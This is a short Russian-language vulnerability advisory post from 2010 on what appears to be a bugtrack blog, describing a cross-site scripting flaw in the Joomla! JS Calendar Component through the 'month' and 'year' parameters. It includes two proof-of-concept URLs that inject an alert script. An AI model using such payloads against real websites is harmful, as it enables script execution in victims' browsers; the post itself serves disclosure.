| Меню |
|
 |
| Категории |
|
 |
| Статистика |
Онлайн всего: 1 Гостей: 1 Пользователей: 0 |
 |
| Вход |
|
 |
|
 |  |  |
| Главная » 2010 » Октябрь » 13 » Межсайтовый скриптинг в Joomla! JS Calendar Component
10:07 Межсайтовый скриптинг в Joomla! JS Calendar Component |
Программа: Joomla! JS Calendar Component
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "month" и "year" (когда "option" установлен в "com_jscalendar" и "view" установлен в "jscalendar"). Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Эксплоит:
http://site/path/index.php?option=com_jscalendar&view=jscalendar&month=<script>alert('XSS');</script>
http://site/path/index.php?option=com_jscalendar&view=jscalendar&year=<script>alert('XSS');</script>
|
|
Категория: BugTrack |
Просмотров: 568 |
Добавил: sepos
| Рейтинг: 5.0/1 |
Добавлять комментарии могут только зарегистрированные пользователи. [ Регистрация | Вход ]
| |
 |  |  |
|
| Поиск |
|
 |
| Календарь |
|
 |
| Архив |
|
 |
|